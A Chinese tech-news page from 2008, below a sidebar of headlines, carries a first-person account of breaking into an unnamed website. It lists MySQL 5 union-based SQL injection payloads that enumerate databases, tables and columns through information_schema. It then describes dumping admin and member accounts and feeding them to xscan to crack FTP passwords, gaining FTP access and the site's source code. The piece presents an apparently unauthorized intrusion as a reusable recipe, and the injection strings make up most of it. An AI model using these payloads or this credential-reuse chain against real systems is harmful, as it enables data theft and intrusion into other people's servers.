硬件业
新闻日历
图片新闻
Meat Card:饿了就吃点你的名片吧(图)
你的名片够特别吗?可以吃吗?Meat Cards是100%的牛肉...
2009/05/31
Q-Sound太阳能蓝牙耳机 你准备好迎接了吗(图)
所有为了环保节能尽份心力的产品都都值得嘉许,更何况...
2009/05/31
科学家将公布证明黑洞存在照片 揭秘神秘阴影(图)
美国一个研究小组日前表示,他们有望在未来几个月公布...
2009/05/31
地球磁气圈是"汪洋大盗" 偷走大气层气体
科学家通常认为对地球具有防护屏作用的磁气圈能够保护...
2009/05/31
分析评论
惠普让计算器在iPhone、Windows重生(图)
这项要价14.99美元的应用程序还可搭配一个29.99美元的...
2009/06/30
投资者看好没有乔布斯的苹果
自苹果CEO史蒂夫-乔布斯休病假以来,苹果股价已经上涨...
2009/06/22

一次简单的入侵,权作Mysql5注射备份




作者: 来自网易科技
CNETNews.com.cn
2008-07-14 02:57:57

  找注射点,判断字段数就不提了。

  判断下权限,非root连,没有load_file()的权限,不能select into outfile,幸好mysql版本是5.

  获取库名

  and 1=2 union select 1,2,3,database(),5....,87/*

  或者

  and 1=2 select SCHEMA_NAME from information_schema.SCHEMATA limit 0,1/*

  and 1=2 select SCHEMA_NAME from information_schema.SCHEMATA limit 1,1/*

  ----------------------------------------------------------------------------------------------

  获取表名:

  数据库名转换成hex:admin=0x61646D696E

  and 1=2 select TABLE_NAME from information_schema.TABLES%20where%20TABLE_SCHEMA=0x61646D696E%20limit 0,1/*

  。。。依次往下爆

  ------------------------------------------------------------------------------------------------

  获取字段值:

  表 admin=0x61646D696E

  and 1=2 select COLUMN_NAME from information_schema.COLUMNS%20where%20TABLE_NAME=0x61646D696E%20limit 0,1/*

  ---------------------------------------------------------------------------------------------------

  爆出管理员帐号后,发现登录不了后台。于是又爆了10套member帐号。整理了下帐号和口令,扔xscan跑ftp口令,2分钟后拿到ftp权限。只是要源代码,到此收工。没技术含量!

用户评论

  • 用户名
  • 评论内容